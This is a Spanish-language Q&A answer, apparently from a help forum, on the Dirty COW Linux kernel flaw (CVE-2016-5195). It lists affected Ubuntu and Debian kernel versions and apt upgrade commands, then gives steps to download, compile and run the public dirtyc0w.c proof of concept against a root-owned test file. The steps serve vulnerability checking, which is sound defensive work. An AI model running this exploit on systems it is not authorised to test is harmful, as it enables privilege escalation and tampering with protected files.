Puedes hacer uname -rv
para averiguar la versión de su kernel de Linux. Obtendrá un resultado similar al siguiente:
4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
Si su versión es anterior a la siguiente, se verá afectado:
-
4.8.0-26.28 para Ubuntu 16.10
-
4.4.0-45.66 para Ubuntu 16.04 LTS
-
3.13.0-100.147 para Ubuntu 14.04 LTS
-
3.2.0-113.155 para Ubuntu 12.04 LTS
-
3.16.36-1+deb8u2 para Debian 8
-
3.2.82-1 para Debian 7
-
4.7.8-1 para Debian inestable
Según security-tracker.debian, debe ejecutar uname -a
y verifique su versión actual del kernel .
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
Esta vulnerabilidad está parcheada en Debian, actualizando su sistema:
apt-get update
apt-get upgrade
apt-get dist-upgrade
Editar
¿Cómo asegurarme de que mi sistema operativo no se vea afectado por CVE-2016-5195?
Puedes probar el siguiente tutorial.
Descarga el exploit.
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
Como root:crea el foo
archivo:
su
echo this is not a test > foo
Como usuario:
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
Verifique su archivo:
cat foo
En una máquina vulnerable obtendrá m00000000000000000
como salida.